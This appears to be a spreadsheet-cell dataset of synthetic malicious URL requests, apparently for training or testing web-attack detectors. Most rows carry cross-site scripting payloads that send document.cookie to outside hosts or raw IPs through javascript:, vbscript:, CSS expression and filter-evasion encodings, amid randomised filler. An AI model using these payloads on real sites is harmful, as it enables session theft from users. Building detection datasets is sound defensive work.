    <t>/ievhdeernesherh/8alocationimro/sijffomhxwhgy/tkfu7rx2fclmry2/1supdateautoexecgdocument/mcyovmazg7f8pr/tb1in/ccataten6ini/idf88zaor/djjzdrl4m-k-cj6hc7zc/sefa.jpeg?tdqy=eht&amp;nmiob=ho&gt;liframeihosopenh&amp;39aduflnltoe=448&amp;vehtnhytaha4s=2processing-instruction+e&amp;8b81.0knetcat-.@=90@m4&amp;n9e=res&amp;tdnc4e=ntaqm&amp;ms7-7j=148glu7tk&amp;etsieise3wkb=roqy&amp;isgangl7hg7=lm'&amp;ltjt=&lt;xml++++id++=++++"+++++x+"+&gt;&lt;a+++&gt;&lt;b++&gt;&amp;lt;script+&gt;[document.location.replace+('http://www.ma.com/cgi-bin/nasemera.cgi'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b+++&gt;&lt;/a++++&gt;&lt;/xml&gt;&amp;ndaibnane3nkbo2=aau1nls7c&amp;09nv=stgp-&amp;ntoipnndo=q&amp;witrcogpesna=)tca8likeen+6a~denetcatnmochapasswdc|</t>
  </si>
  <si>
    <t>/ntc6laemp/un5homedolk6w/yvewafsh/rd.htm?peimsina=18&amp;ed=nmq&amp;ietaoy=488039030&amp;e6ltiouxiii8ata=&lt;img+++src++=++++"+toveartr+&gt;+++"+++++onmouseover=++"++++[document.location.replace+++('http://www.ites.com/cgi-bin/anstetde.cgi'+document.cookie);]++"+&gt;&amp;ruiu3tthy=482147&amp;sh=7074027&amp;essve=88958124</t>
  </si>
  <si>
    <t>/eyvxzmie4b/ua4sv0/te4rdbti/e0/rshdei/2q29aixdyfc_zo.gif?twhneol1t=&lt;div++style++=+"+++++binding:+++++url([http://www.serone.com/script/nfdx.pl]);++++"++&gt;</t>
  </si>
  <si>
    <t>/tdtaekecdolips/wvp.zcxtb-3uhlhaving.cfm?qteite240tgse=st0\\&amp;iwelet=264275149&amp;zstpryoeheext=nbkuoh.silk4&amp;iwaoj7=t:1wocrrewast&amp;pwsatsnrceh=&lt;a++++href="+javas&amp;#99;ript&amp;#35;[document.location.replace+('http://www.it.com/cgi-bin/an.cgi'+document.cookie);]++"+&gt;&amp;rstcenzdf=-acceptyn4&amp;onht=937407068</t>
  </si>
  <si>
    <t>/ts9yzkgi/ewnvgg8nnymupgc.tiff?ven=mt&amp;ieaetebzrate2tv=nopassthruani?ndrd|rsthrehaving&amp;laywmevalt9olyj=[\\xc0][\\xbc]script++++&gt;[document.location.replace('http://www.atalisng.com/cgi-bin/na.cgi'+document.cookie);][\\xc0][\\xbc]/script+&gt;&amp;62t=6947&amp;itehe=60746&amp;emri=~formoe&amp;rxjet=s\\+eauyk1b)erilt&amp;x51h=c4sbew5</t>
  </si>
  <si>
    <t>/bmhkgsorrde2mhjh.pl?beujfhif=bsg&lt;mirn&amp;n@crlywgets=&lt;!--+--+--&gt;&lt;script++++&gt;[document.location.replace+('http://www.chilelit.com/cgi-bin/llista.cgi'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;&amp;nbhhqtdeeoesg=n5.q8kqz</t>
  </si>
  <si>
    <t>/rmrurtnteesh/r3wb32uijhsq9xib/imesn/98.-bfwdiqcp4b6rd6/src7/h9wznoidiepyat/lktq/_j@2@/iks/tj-njs95e@du4vc.jpg?auzwjiz0=&lt;style&gt;&lt;!--&lt;/style+&gt;&lt;script++&gt;[window.open('http://223.145.14.11/et.mdb'+document.cookie);]//--&gt;&lt;/script++&gt;</t>
  </si>
  <si>
    <t>/ti3psstile4eneeonfc/tygzsg/y@f.documentd1umstylest.shtml?svxchild=5se&amp;onp=&lt;img++++src+="+++livescript:[document.location.replace('http://www.an.com/cgi-bin/totanestsi.cgi'+document.cookie);]"++++&gt;&amp;tosh=un&amp;mysklau==e&amp;pbgsoundlv0@=olpnntms&amp;sbrminent=4432243&amp;uyszbnb=stl7r2bnzteni&amp;phtf=2279&amp;rohraawm=hoxsloh0o&amp;smtnitidihh=mpi&amp;ansbst8rx4iazrs=6426219</t>
  </si>
  <si>
    <t>/72tjtpwq/hlmi/bjdvcphpcm/i0be5g.gif?ieoasetox=2&amp;negxi1d=026577&amp;eimft=&lt;iframe+++src++=++++"vbscript:[alert++('eneno');]+"&gt;&amp;da=aitelnetd&amp;gtumailhlbe15htaccesy=wttelnettidensfaumh+&amp;remeiw2uoemo3l6=t9ipwaqese0mn@&amp;tehortdusho0i=o56&amp;grenptei1m=horigresw$nkgtss&amp;6rn1hlg=ispm1irs&amp;g46inhinln=nb2lhosabde&amp;iqcsohebne=9nkwchn&amp;lzr3tt9hm=m9+z\\</t>
  </si>
  <si>
    <t>/uo8optk/owoxir/g6etg4aejharii/liiiory5ttcaz/nbaoo6eeeerotaxoulan/rtbrb/dselect04zx@npl/reiade/txfy5.k3xuydt0a4t53r/extff2gurt.bin?doee=&lt;link+++rel++++=++"+++stylesheet++++++"+href++=++"+++++javascript:+++[window.open('http://177.114.33.91/setoto.cgi'+document.cookie);]++++++"++&gt;&amp;kv@zia0xml@=3</t>
  </si>
  <si>
    <t>/er19ltr/oero/c1ert3dato/fpim1wwhy26o7qnek2c/ss/rjyg/_lfey/cit/sne0wa59oierhc.shtml?3o6dy=n@buzn4d7q&amp;3nexy=&lt;link++++rel++=+++"stylesheet++++"+++href++++=+"++++javascript:+[window.open('http://70.105.128.102/icicne.asp'+document.cookie);]++++"&gt;&amp;tn7t=esmochaaactcsed~&amp;rke2=iwlhjnqf&amp;ohdye5s5a1t=dig&amp;oleseaa=tgbnntir&amp;sal=locationcsit]caeou&amp;1cr=8&amp;enemaqhemonlv=logdnodejer(g&amp;mhae4+p&amp;raffe74j=irclx&amp;oraoasamku6d=d&amp;&amp;3mh=updatesnh\\xditicat:ae=1siei&amp;7ikhpsox=381015</t>
  </si>
  <si>
    <t>/hfigoiu9do/ittzuheatf0/emjuhy/x2tzg-r_pu/ua9udnidfsarh7eitead/sypsodwujd@8x1w7yp3.mspx?afbwunion@1@c.=ao&amp;lmticdqtscast=&lt;style+++&gt;&lt;!--&lt;/style&gt;&lt;script++++&gt;[alert('iiizngekte');]//--&gt;&lt;/script++++&gt;&amp;hlw=l9rece5ero&amp;c4bna=uht</t>
  </si>
  <si>
    <t>/r2zi6_0vixi/bppiyhjxx74me/lhdhedsxoenxb/anujt8iuyc/enhr5irukamod/p./tioeao4nwsvz/uailen/3begm/sksc0j4o/5n/eeireselauwjrmyh.pl?6h8=&lt;!--+--+--&gt;&lt;script++&gt;[window.open('http://210.150.40.61/rianat.mspx'+document.cookie);]&lt;/script++++&gt;&lt;!--+--+--&gt;&amp;tiryeinlmeorrou=4&amp;sitnnx=tiefoe+e/hmerm+m&amp;emataj=735293&amp;h0or7ro3iqlome=iaaalqopendna&amp;gieuiirnnnn=53880830</t>
  </si>
  <si>
    <t>/aitefsres7hex6sofn/tu9zmjvt8chw/slww9/rjzrxl4qczx/rtiran9hnhros/lgn/os_3e1lzc/twb_lljflf-jqxh/trct54yntncmoeldc2ri/et/c0oitkn/oydigskyp6.js?mrypasswd0acmdt3pyh=ccunbgcmlfyt&amp;oauehehe=03043338&amp;4h0hjk.rscript.and4==cat~s&amp;hegcd0y2=udsaaeieak2e&amp;ihnlruortpo=gqewtp3zqgyb&amp;rexkgrecpae=&lt;img++++src=++"+mocha:[document.location.replace++('http://www.etta.com/cgi-bin/delaie.cgi'+document.cookie);]++"++++&gt;&amp;lpvjihzdf6db=eplhg4ndst9s&amp;an8tu=lq4</t>
  </si>
  <si>
    <t>/r1o5ybc4x@updateerlibn/window.openzllcmdtmp7@_autoexecj0g/9urhnesndn2sspsdn4r/pndhochl.cfm?styhec4=tl-&amp;eo&amp;dbsenne=ejpmrqm7klz&amp;emtaa='&amp;aselr=544543&amp;ndpuus2e7d=lp0ydgxrefl&amp;@vu9whrd=5az4kwote1z&amp;iaexeisvhlbvsyz=atitvar0e&amp;wgg=&lt;xml+++++src++=++"++javascript:++++[alert+('elt24eedj');]+++"+++&gt;&amp;weeooyoama=ety&amp;0p0ionievakzs=g</t>
  </si>
  <si>
    <t>/esslwnzoaorad/ctinm4node9vs.whaving8/eab@j9/veo/ertidno44cnebkx/ietsotuhfti7s/ra/xyy3dbzseeetmeqmbp/scriptonmes_zzyefrxp_.php4?6phj=&lt;link+rel=++"stylesheet+++++"++href+++=+"+javascript:++++[window.open('http://178.43.127.75/ns.pl'+document.cookie);]++++++++"+++&gt;&amp;shhliizitbnetth=8856</t>
  </si>
  <si>
    <t>/ibt2satdns8a/ubkmkac_tto/hlbqwjed/shkrdpd60q36ka/vjqjselect63f@s/aoeeaeoatdeto/lsajdg2natea25e3.css?mwh007t_=em='mnoeuc&amp;igjrs=logbscripte~0dons&gt;&amp;sock_streamibh=2hwtnayfot&amp;rtfus0=tetnizinsiehrx&amp;rsinehaxen0eqe=6bwo&amp;rebia7dn=&lt;div++onmouseover+++="+++++[window.open('http://109.80.56.173/ietill.bin'+document.cookie);]++++"&gt;&amp;5aeeheh=akdann&amp;tj=uh4&amp;ni=twn|taors1&amp;ranmtsn3ye3hwh=+or&amp;oevh=lei3v&amp;aes=bandontuenienodedtmp</t>
  </si>
  <si>
    <t>/tfoinrddnocty/iadcv/ot7em2avsfnqvk/zpassthru5.fsshutdownoxzuim/ytfxltroidiat9h/adcdug3evall1vmt/1nw8n3gap0t211_1o6ls/sob/edt2qh12xouz48csoovw/ars7tntaisijdodvahnc/aup@cx3-0rxjzgv.shtml?ceh=ae'ot&amp;2eendm2iomytio=&lt;link+++rel++=++"++++stylesheet"++++href++++=++++"+javascript:+++[alert++++('oeanum');]+++++"&gt;</t>
  </si>
  <si>
    <t>/h@7pzsprs/d8@.uvocb7o1jzzro.shtml?sou-luvxxp_ksg=5303681594&amp;aamoicaidshteri=rdeq&amp;uwpositionscriptp=1757665&amp;aentiroju=&lt;img+src=javascript:++alert++++('arr.nglsk')&gt;&amp;zndx=0&amp;a-gygam=asyti&amp;istdinliotmpcya8r=n9+/$&amp;tneoeeaeomiee=npaf3.iy-&amp;loioat=98&amp;niii=ahrs+o&amp;un0frrettgt=oprocessing-instructionrhe&amp;%u6ellnt&gt;&amp;hrwf.libkc=hinputodocument3g&lt;)ilinkdrd?[libyaccess_log+&amp;teehrtbhonehwig=dr5m&amp;10wr7or2=ve</t>
  </si>
  <si>
    <t>/huetneyfaxisn/nd2tpnloantne9/dowpliyon.cfm?nox6ahotri=96663297&amp;t2seogei=629655836&amp;ithsotqsn=ttnany&amp;reie1imsaeor=tomaud&amp;.include1n=at4ct2eic&amp;php6pujyxe0adk=-&amp;aizrretro=&lt;div++++onmouseover+++=++++"+++[alert++('eoiq');]+++"++++&gt;&amp;tbh=zt4n7&amp;8esma1esgef=r0beeadhk2ysluth&amp;tptca=g7oean&amp;dnoa=ia)o@o$e(r=ypat+eo</t>
  </si>
  <si>
    <t>/fdz4/inhxd@-j8d/o89tgkg.3fxsc--h/omtzeltshrs2tufeirmr/egto4sjrwei.css?afzankqmfv%ua=l5li&amp;1otsnm2meua=(&amp;m6&amp;gerds=&lt;a+href=+++"about:&lt;s&amp;#99;ript++&gt;[document.location.replace++++('http://www.elngli.com/cgi-bin/arde.cgi'+document.cookie);]&lt;/script&gt;"+&gt;</t>
  </si>
  <si>
    <t>/hlf@jljkjhc6x@-1r2h/ahyixv8fzfxcp1a_79h/5duetox3a_mhvyk0i../eate1ao6wosenoieoek/o1az1crcpgjl.jpeg?tdsn=8320595406&amp;hntwumopt=amzktprzegsydetm&amp;dnnosem=8&amp;oeyb2ply=944&amp;saathh8tl4octy=oaretcwsdo~toetepsnexec7&amp;n2jyexecb6yprocessing-instructions0al=mwdefg&gt;'s&amp;12rcdaswindow.openqieval=093174&amp;ysh=+:&amp;_6c4=bihyztttaetei&amp;hteberlgg=afyaxhaeg5jcog&amp;vgnraiz=iqyiwecdeupdatesrhp&amp;9rlsedhtntse9ns=7&amp;an3xytki7=tyg+iennetcatreplacet=ror&amp;ev2nat5liww=&lt;xml++++src++++=+"+javascript:++[alert+('vif');]"++++&gt;</t>
  </si>
  <si>
    <t>/q7ctfkw_us/esz3uz2g89pznbgim/tae9r7nolw/jjzlc2xwtasttkefn./ep4bcdeyyfnh71f/bw@hgo-reh30i/sp6udapizrrblfnj16/rscqwxsy/cann/sel.cfm?hr=&lt;a++++href="++javas&amp;#99;ript&amp;#35;[document.location.replace++('http://www.etetle.com/cgi-bin/tant.cgi'+document.cookie);]"+&gt;&amp;uhtsoui=ha&amp;higrznpdbqinue=ese@8+'th+exec&amp;libe=tebhoe&amp;9l=r1]dyt3e7+agg8openu&amp;jyno=tnevtsor</t>
  </si>
  <si>
    <t>/av/ptrlb/uywf/hohvfpihewsgzg71-/9yugtoeautuvta/bbd33hihrx/otlr7omg/kqcwaccess_log4fh/otea0ranmians/nebd8gnr.exe?mdhftakse=aautoexecde=ortrhbgsound$od3mel&amp;hazmyeuraev=&lt;a+++href=+++"+about:&lt;s&amp;#99;ript++++&gt;[window.open('http://118.201.5.53/orra.dll'+document.cookie);]&lt;/script+++&gt;+++"+&gt;</t>
  </si>
  <si>
    <t>/oibhxeenigqshe/sr_zr9hidsm08zrsx.cgi?lqqg4_zkjg=7299187&amp;eyoet=ni9aiaselhyu/ostdinae&amp;qatacdzi=&lt;img++++src=&amp;{[document.location.replace++++('http://www.si.com/cgi-bin/ie.cgi'+document.cookie);]};&gt;&amp;eihee6bigotoaeh=ur&amp;bdnzt1sdfazrono=27&amp;6niui2desetg=cmg)tts&amp;ihte5nxsmh3s=uttoulhs7erlaokvka&amp;2gusap_groupby8smn=ef7ono.h&amp;shicezrtpttb1m7=265109&amp;v6x84vwo=odanalfer=siw&amp;aeshtnnaoawacj=8a4ut&amp;c4r5vs=sv8.l@&amp;dlracmen=21755&amp;jk9ie601yn7=a](dela(6hs&amp;opigoneeebelsrl=ehht5@9sst</t>
  </si>
  <si>
    <t>/intibt7oeoijqigmdi/tdpu1ojxha6i8r/nurg1snvyeowtomane/esllo75cidots9e/tzcbyeyi_y/rg/elbwtbenesjdo.htm?lsfiiwsumrlb=4129&amp;t4ftlso=23719467&amp;dthh=maidit&lt;st&amp;tdpu=nndd&amp;uylueip15msr=42&amp;nfobl=m$i1ls\\fstprocessing-instructione&gt;e&amp;tioent=tilpcpenezhftz&amp;ia=&lt;div++++style+=++"++binding:++++url([http://www.leta.com/script/6rysoekj.cfm]);+++"+&gt;&amp;etlisfplgtohst=dodk2jlwf@_z&amp;document1ah=aphbamabsnrrh</t>
  </si>
  <si>
    <t>/lio9ytr/oqve5italdkzkxz@g/gofnbyclgjm1cqwjf/_-wjzfchtpassjm/jxlwq0oa4b8ane0qbmh/lfttnrersrrd/swc.tisheezeoku3ob/entsvejanfqtdnywz/txic4jdhhavingti/zio7d3oatt.sh?hoknoang=&lt;div++++onmouseover++=++"+[alert++('6ua8cy');]"++++&gt;&amp;ntn1emtfrroey=564</t>
  </si>
  <si>
    <t>/o.e4l/d69na3ao/iadlctteele9/twonan9satetwutftti/tv/oiti/ieyns6ai/2miralfh/pigncp/n_kq9zr5354kvx/ttjhuomeeothntbee.php3?w5gnb=ndmpwgae&amp;g0dedveljeatl=s+o&amp;be97nnjroa=&lt;script++&gt;alert++++('v0ya.yy0w')&lt;/script&gt;&amp;lrl9iniei=641&amp;1grsh8n=rlmrnsyonpssscl&amp;twqogmr=8&amp;nrtaitssmhw=zpi0f</t>
  </si>
  <si>
    <t>/ntetiarulteadur/hivedhoinux0pirrssue.bin?evomii=aiafromtla0&amp;exspjhdenrwqzgr=&lt;div+style+="+++background-image:++++url(javascript:++++[document.location.replace+('http://www.orreniol.com/cgi-bin/iearisveal.cgi'+document.cookie);]);+++++"+&gt;</t>
  </si>
  <si>
    <t>/ryzsheonmnzkn.d/aurr9_p/teou/9ein/lf9poeomreo0oth3eww/8vh9hlfp9xb/uar/et5emfi.tiff?tnn8iere1e=srk&amp;zaksihfh=ndd7mbwxylzut&amp;8zformdhome-o-3vf=cncuof&amp;ckeaeinawfu=69232537&amp;hode9mimbtuab=03750&amp;arpnghrtrh=i4e&amp;ya40t=30&amp;dtiddj=s0py0qyr7nj&amp;lydiet=d+++style=left:expression(alert+(ape.ikyyt))</t>
  </si>
  <si>
    <t>/a-z8bzs.rgli2/tyyzguii6/abzkvsx15hh/ckmi6c4i/gruobohp/n6uwrb2qu@lr@du/e_r/aisget/zex/hrbue6.php4?detkeghlecnc5f8=&lt;iframe+src+++=+"vbscript:[alert+('rnega');]+++++"++++&gt;&amp;0ia3e=y5r2e</t>
  </si>
  <si>
    <t>/feh6hersdyptmu.tiff?ceydd7=&lt;img++src+++="livescript:[window.open('http://42.206.144.213/to.aspx'+document.cookie);]+++++++"++&gt;</t>
  </si>
  <si>
    <t>/ap.msf?mij8xi=inn+++++"++++++++style=left:expression(alert("+++eur.ni+"))++alt++++=++"</t>
  </si>
  <si>
    <t>/hhaxhobbfadwv/mcogfmnwrat0ck/9i9qotma/i5hpysbcigt@pkjqckhs/itnllsmanisoeendmf/vdhan2ileaewcel/q6s1gtruu.__@l../ivoo@yqzngmlb591p.html?msnoi4mfr=hngk&amp;_zxbssq=&lt;iframe+++++src++++=+++"+++vbscript:[window.open('http://130.77.161.78/litr.msf'+document.cookie);]+++++"+&gt;&amp;@i_j@ha5=fromiseauo</t>
  </si>
  <si>
    <t>/iq/eqs/td8tosvr8djcrkqt/ekadj4jjfritmohrb/svqyp2lw3x.tiff?v5o4=&lt;meta++++http-equiv+++=++"refresh+++"++++content+="++++0;url=javascript:++[alert+++('rhhla');]++"+++&gt;&amp;oo4s=ortktohg3wntrtnnnc</t>
  </si>
  <si>
    <t>/ebm3ijyje/tedntsefae1r/eseerxta5/rnuincludeigg/t4glm1hkfv43tvgvjx/x0lyxefo/2djmp@xmrqwz0/odrtkmigroxk/acg3vcswagjon.htm?cju1ahiecthe0=nrburnqevonona&amp;j-wlib@49uut=2rt&amp;aa6e8uryd=hac3ilgwhaedo&amp;hj2vf8r=19310&amp;gaiesnpdeehrho=&lt;![cdata[&lt;!--]]&gt;&lt;script++++&gt;[alert++('te');]//--&gt;&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/8idije4ag3a/tjtdimawoq4tm8tfzx/kahastgwtnj/mgl/pzbpwu@q.qt3g.no/hs6ee/2mx_.js?yttpdyhrhltrc=b/u$&amp;n3et=&lt;iframe++src+++=++"++vbscript:[window.open('http://189.207.229.115/tioric.cfm'+document.cookie);]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/jd/4@-_k/qpsc1sf@hg6ownbb/cice/i@x3yhizcixt@.mdb?eyjqe8tsncey=n=eta&amp;ibsakinh=65&amp;biy6d=mm2.x&amp;lq3uheir=khqe+mtformso3s&amp;beds=&lt;img+src++++=++++"++++javascript:+++[document.location.replace++++('http://www.mare.com/cgi-bin/al.cgi'+document.cookie);]"&gt;&amp;twltede=escqmsnry&amp;edhodlnele=mte&amp;0rl=rdlsx&amp;lie=i@a6axs&amp;ohejar=betweendft5oascr=dn%i</t>
  </si>
  <si>
    <t>/p-zj6@etdz01n6wei/aiieaosoeehscmhe/vtc9/iytmpoy6blofiadminrc/ykr-esjadedcx7/iyoqofji/hevh08pooo9p/5zj6apf8ar_mhsbavc6/@my/e4.jpeg?ordudot9lweohb=eet&amp;union.@kqzji=&lt;div++++style++=+"behaviour:+url([http://www.chll.com/script/tan5.nsf]);+++"++&gt;&amp;cenaa9coe2tra=sex+l+v4mi&amp;cyhhovrenstoia=en&amp;sxs=tnlehaving+2d'&lt;@odt+&amp;rao=3535425</t>
  </si>
  <si>
    <t>/yietcdh9xssreplaceobject/r0wxddrfvnq/ecm8wgznodvs9e4zggbw/he/gaethoof/ydre2cwnrnses/rqu8.js?iirderpre9itmnr=bsiiaacerae5/4y&amp;hueachagehs=3t0aabx&amp;xtc=2&amp;neteannadeeotsr=&lt;div+++++style++=+"behaviour:+++url([http://www.arna.com/script/mb2itxewe.pl]);+"++&gt;&amp;nyn=65425&amp;vjdid=ssrmetapi~3&amp;&amp;gooiobtb3s=69837316&amp;21ets3iohaxrtw6=rrt&amp;ae7woaahh=a9zrocl3qzy&amp;5psedtl5=xddyyiec(cralxc3&gt;</t>
  </si>
  <si>
    <t>/ea/eue01xl/vthoyom/eqk3-cvogdtn@/uydvimd1xoc6v1vlk.swf?nimgtrnh=ii&amp;asbdriesrh=373&amp;emesce7hlezc=tabqeiio+eddbetweenhhd?&amp;i6oeaoeieru=229&amp;ueorr3crr=95&amp;ancnne4oloehiie=httptkv&amp;elmd=idyxy60g5g&amp;lncr0ndtojmie=&lt;a+++++href+++=++"++about:&lt;s&amp;#99;ript&gt;[window.open('http://19.195.102.173/etve.jsp'+document.cookie);]&lt;/script++&gt;+++++"++&gt;&amp;mo5ieiate=dn3nhhesystemhomes8oan&amp;ei=hl~</t>
  </si>
  <si>
    <t>/hnk8vvjum0un@/2pwmrhdterzrwbxba/fformmqu-9eu/ut5dnqmd4htpass8oym/teopdo6oliiehtyfn/ln/nnpr/h@ree@aladhi6x4arbrt/dlg.css?1dz1r3htcxscriptg=47163&amp;oiftdjn=&lt;input+++type++++=+++"image+++"+++++dynsrc+=++++"++javascript:+[document.location.replace++++('http://www.roerde.com/cgi-bin/te.cgi'+document.cookie);]+"&gt;&amp;peiigsef6niwaa=03&amp;33euneqlaoii=6</t>
  </si>
  <si>
    <t>/-dizyz2req7/rmflscysystemtc@lo0/b0keymyy_niu/ng0cqie4/nhyjta3aett/metgtihryna/v.ff/gfknro7oohosst/tdlbl.aspx?ceudenxtdt7d2d=&lt;img+src+++=++++"++ni+&gt;+"++++onmouseover="+++++[document.location.replace++++('http://www.rise.com/cgi-bin/laatic.cgi'+document.cookie);]++"++&gt;&amp;kqs6wd=lnrd3|ryn+eo&amp;ecihuaturu=ibso8vfol&amp;ldtirn54lts=ealtojl&amp;wihu2=pviuyvgwa</t>
  </si>
  <si>
    <t>/8mx7j0hsulx4ecn/l_w5m05ab/vwceixdsituiy4/2ruae0cd4da.dll?i-inurwhereo5i=385280&amp;otbrsk=&lt;input+++type++=++"++image"++++dynsrc=+"javascript:++++[alert++('srvihe');]++++"++++&gt;</t>
  </si>
  <si>
    <t>/d@uxfmfz8q9lp2ljcp.asp?4yi8gsr0like=8565&amp;md5eioe=tstlohh+replace)ljo&amp;do5essv6e2hg=613304&amp;s@_jq=7012&amp;hdjs84atkred=tmy-edhuconnect+:rd&amp;-iph_kwinntsc1y8=5&amp;ezkyah_s5='zspassthru&amp;9roaiqtln=dy4&amp;eyaernaoltwza6l=oo7wt&amp;vll9rhr6nme=edne&amp;hbdoegeoee=kgzyh&amp;catwylt-xizi=98509273&amp;nl8ean2wi=&lt;div+++style+="+++binding:+url([http://www.toaltatr.com/script/aio.nsf]);"+++&gt;</t>
  </si>
  <si>
    <t>/ikh/n5ltitoebhanwro/9rhctamsn5yencany/nwp_3/3winntwbyzlq4tt4s/d85r7nc_jzy/uuvjhpk8rp/aewopt/hkptt4epdrdiiroeskie/rxfe6uw.d6fch2@immw.dll?6iuana=&lt;a+href+=++"+++++about:&lt;s&amp;#99;ript++++&gt;[document.location.replace('http://www.nsse.com/cgi-bin/ieasatliri.cgi'+document.cookie);]&lt;/script&gt;+++"&gt;&amp;minim0=fo&amp;nlwehust=9&amp;xelednteraeoie=041529122&amp;zadvmoq=ua=thssock_streamwaandtsl&gt;h&amp;m4lhesh2=94s&amp;aarmioto0s4bb=-z&amp;aaiunee=mevalc&amp;oohnncp8slt=319&amp;aajqhhac4adnc=mprocessing-instruction7sle+ohi4hgesioph&amp;ebtrt6=8688&amp;q50@u3x=]in&amp;rvtupiefr=516863&amp;ilotteod=0814</t>
  </si>
  <si>
    <t>/ob/owecsaie/hgegjaf4yz/iteitiit/m0tdhduht/ks9ettasloikdxtiebl/9efetrmnpnk4hn2es/bvggqa7y63pk_/qxsnhjpn/hsmu._ytjlw/csly.php?masrsaaoetvon=5725915&amp;endwfe=fnpatpvqt3&amp;yhghomesock_streamhtacceslmwujm=o.h4qo&amp;eadlae=o8uw4yfxxa&amp;gue=eeelvllree2ehsttcc&amp;kbeeon=&lt;style++++&gt;&lt;!--&lt;/style+++&gt;&lt;script++&gt;[document.location.replace++++('http://www.elmana.com/cgi-bin/al.cgi'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;abajnulpp=iimg'tt&amp;mdn1=ska&amp;gestr3imeiw=10&amp;i6n8q0o0tcnne=a+aefh&amp;t1i=+1j2&amp;bcbn7yswsvxg=24/re&amp;_hu.o2rhopprocessing-instructionr=gkob</t>
  </si>
  <si>
    <t>/pt/omkr/m5uorwsvczees7stri/u.gdrn1oborx5i/szsb01/6dgybklm/k0t79wvihhbltreie/r2tzdl6siinhrsdou/ahen/bicpxzjayprt/schiaskfr/7q1jb5l.html?fb=3&amp;sstainudeii2w=[\\xc0][\\xbc]script++&gt;[window.open('http://166.140.86.240/ch.aspx'+document.cookie);][\\xc0][\\xbc]/script++&gt;&amp;telta=048696&amp;te4foiqxpe=24949</t>
  </si>
  <si>
    <t>/okmwkp_2r/pgtpdd/ci8hovuu2srdhgl/nynsincsaeosndatt/e88b@7hi/uvgg_tz3wwdtdfzz/mplxcme/uez8togheneol5vcetdd.asmx?ehhgenlar3kb=ieqaeaouaefshhswt&amp;3oedadri=txe3ra&amp;n6mlo=01583259&amp;gmcq_p0ccm=gtoe2ersoho3s1&amp;negifzpb0alrehh=&lt;img+src++=+"+setaneni+"onmouseover+="[document.location.replace+('http://www.na.com/cgi-bin/onri.cgi'+document.cookie);]+++++"++&gt;&amp;pqphphz=m1nreizyxp5frmnre&amp;satioece=1909850</t>
  </si>
  <si>
    <t>/o9ld/r5pmc/dtrbrtfrnisdss/ht3bfhqoy1dcbbf1/tomngssynnateynuugeg/a4akzkhonmqf.2/obak2aq-/rsrneier80ce8o/snjshspnedyot.msf?seobuthh=2;refa+er&amp;im=1759760&amp;sn=94324&amp;rtteohatomhe=rhr@ba[pnaopda;9ilbd&amp;oe6eikg2dtdee=erdd+hn&amp;kvtp=e?8+f&amp;yoauo=&lt;div++onmouseover+=++"+++[document.location.replace+('http://www.eltietge.com/cgi-bin/isatenchta.cgi'+document.cookie);]+"+++&gt;&amp;nn=k8rtreteajlezv</t>
  </si>
  <si>
    <t>/wenhb0xrom/aehe9heh6loto/gorpwhi0aq_6kq6/henilwtq/fnjzb3z16/lnlyvp.htm?mt0uttsonri5tp=6874695&amp;3ehencfutone=sqg-.jl_g34&amp;rkbtiao5s=&lt;img++src+++="++++javascript:++++[window.open('http://114.47.110.69/ie.php4'+document.cookie);]+++"+&gt;</t>
  </si>
  <si>
    <t>/haior4ewhtenetq/c9wj./5onaer/iux9qzh/0t7rlltvr/01d4ftdan@fflpg/gesqirl/rhy2rwlfav.tiff?ilehsttdm=o57fphb2&amp;fsi3esr=75718&amp;io5sauh=bd&amp;ecasuokithp=1653187&amp;z51h%uin8=hzeiiryk.t&amp;7n=&lt;img+++++src="+++++ta+++&gt;++++"+++onmouseover=++++"+++[document.location.replace++('http://www.el.com/cgi-bin/anchonna.cgi'+document.cookie);]+"&gt;&amp;kou=49337&amp;tde=document6&gt;&amp;wcid7wgogysr=iols2ai9s</t>
  </si>
  <si>
    <t>/do/ivrauirv3cktin.php?tuestdno=&lt;meta+++http-equiv+++=+"refresh++"+++content++="+++0;url=javascript:++++[document.location.replace++('http://www.stmeng.com/cgi-bin/re.cgi'+document.cookie);]++"+++&gt;</t>
  </si>
  <si>
    <t>/nljapneuwrzav-j.isi/5.m/tbognnssa7nout/ep2qub4dbh-nakj@nf16/vtcetho3tn6vans9m/uitueahhsb/8odmwhereydocument-c78mdjz.gif?otocwbea=2fnformo&amp;nhdu=&lt;img+dynsrc+=+++"++javascript:[document.location.replace+++('http://www.li.com/cgi-bin/nden.cgi'+document.cookie);]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/e2e6owdpbbobtiw.htm?gd8locationmbjosvt1=32020507&amp;9nfeennte=do+kelasnonn&amp;oa81s1aneoc6nm=h\\&amp;fn6d=bewindow.opentelneta2h~group+byupa&amp;'+)+li&amp;9jn1bdy%u=perd&amp;aartdwieic7=&lt;img+++++src=++"+++++livescript:[document.location.replace++++('http://www.ni.com/cgi-bin/rinsll.cgi'+document.cookie);]+++++"+++&gt;</t>
  </si>
  <si>
    <t>/em0l_c7uvf_ykxd/vywfmr@gay/ameilhsauohy1axe5/mtr/rdytui91yrwfo.7a/iyvc/eyksdhutvu-p8/oparzz/0e/0oetntdwrmhiii/esiefunexkoe/vs.html?srqy=ondytfu&amp;we=366&amp;p8dp2binl=eerooe&amp;1object3zczuf=oupp&amp;hme=&lt;a++href++++=+++"++javas&amp;#99;ript&amp;#35;[window.open('http://154.40.227.112/roolte.exe'+document.cookie);]"++&gt;</t>
  </si>
  <si>
    <t>/nxce/l.cvb-1dmzu.html?o8eleltg=nutxmll&amp;ceostwtptteshe=88074&amp;hnblrtlaitm=60011&amp;macceptytfx=woqtfoz-xl&amp;me0iwb=uiueis1mz&amp;idvtanldhsohele=82510&amp;nuraenap=ia&amp;ngfetb6jeu=i2bklob.jw7&amp;caoo=tmni&amp;ytsslte=h%like&amp;9x0z=srtasis1&amp;tneeiva8s=&lt;xml++++src+++=+++"javascript:+[window.open('http://216.97.198.144/ndla.exe'+document.cookie);]++"+&gt;&amp;3eteomwlgtred=ethv1aruj</t>
  </si>
  <si>
    <t>/atptodmvtatne/zeuriddfd/3itsst8hshmrs6/paerr5/xjokmh/eisihlsteo6m/@f/soeleicntonseraoee81.htm?acrherdze=awhdst&amp;ye0nuinmt2reh=etnn8xnrw+lts&amp;a&amp;eaelgowdtrto=&lt;div+++++style=++++"+++++behaviour:+++url([http://www.el.com/script/nu.mspx]);+++"+++&gt;</t>
  </si>
